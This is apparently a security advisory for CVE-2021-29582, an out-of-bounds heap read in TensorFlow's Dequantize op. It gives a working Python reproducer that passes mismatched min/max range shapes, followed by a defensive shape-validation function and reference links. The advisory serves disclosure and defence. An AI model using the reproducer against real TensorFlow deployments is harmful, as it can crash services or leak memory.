CVE-2021-29582: Heap OOB read in `tf.raw_ops.Dequantize`
Due to lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read from outside of bounds of heap allocated data:
```python
import tensorflow as tf

# 5x10 input, cast to the quantized quint8 type expected by Dequantize.
input_tensor = tf.constant(
    [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,
     -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,
     -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,
     -10, -10, -10, -10], shape=[5, 10], dtype=tf.int32)
input_tensor = tf.cast(input_tensor, dtype=tf.quint8)

# With axis=0 the op expects one (min, max) pair per row, i.e. 5 of each.
# min_range only has 1 element while max_range has 5; the op does not check
# that the two agree, so indexing min_range per row reads past its buffer.
min_range = tf.constant([-10], shape=[1], dtype=tf.float32)
max_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32)

tf.raw_ops.Dequantize(
    input=input_tensor, min_range=min_range, max_range=max_range, mode='SCALED',
    narrow_range=True, axis=0, dtype=tf.dtypes.float32)
```
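The missing check is a shape consistency test on `min_range` and `max_range` against the `axis` dimension of the input. The guard below is an added example, not TensorFlow's own patch: it is pure Python over shape tuples so it runs without TensorFlow, and a caller could apply it to argument shapes before invoking the op. It rejects the reproducer's shapes (`(5, 10)`, `(1,)`, `(5,)`, `axis=0`) and accepts the matching per-axis and per-tensor forms.

```python
from math import prod
from typing import Sequence, Tuple

Shape = Tuple[int, ...]


def validate_dequantize_ranges(input_shape: Sequence[int],
                               min_shape: Sequence[int],
                               max_shape: Sequence[int],
                               axis: int) -> Tuple[bool, str]:
    """Return (ok, reason) for a Dequantize call with the given shapes.

    The per-axis path indexes min_range and max_range once per slice along
    `axis`, so both must be 1-D with exactly input_shape[axis] elements.
    The per-tensor path (axis == -1) reads a single value from each.
    """
    in_shape, mn, mx = tuple(input_shape), tuple(min_shape), tuple(max_shape)
    rank = len(in_shape)

    if axis < -1 or axis >= rank:
        return False, f"axis {axis} out of range for rank-{rank} input"

    # The two range tensors are walked in lockstep; a size mismatch means
    # the shorter one is read past its end.
    if mn != mx:
        return False, f"min_range shape {mn} != max_range shape {mx}"

    if axis == -1:
        # Per-tensor quantization: exactly one scale for the whole input.
        if prod(mn) != 1:
            return False, f"per-tensor ranges must hold 1 element, got {mn}"
        return True, "per-tensor ranges"

    # Per-axis quantization: one (min, max) pair per slice along `axis`.
    expected: Shape = (in_shape[axis],)
    if mn != expected:
        return False, f"ranges have shape {mn}, expected {expected} for axis {axis}"
    return True, "per-axis ranges"


# Shapes taken from the reproducer above (constructed call, no TensorFlow).
POC_SHAPES = dict(input_shape=(5, 10), min_shape=(1,), max_shape=(5,), axis=0)

if __name__ == "__main__":
    print(validate_dequantize_ranges(**POC_SHAPES))
    print(validate_dequantize_ranges((5, 10), (5,), (5,), axis=0))
```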
References
- github.com/advisories/GHSA-c45w-2wxr-pp53
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-510.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-708.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-219.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-c45w-2wxr-pp53
- nvd.nist.gov/vuln/detail/CVE-2021-29582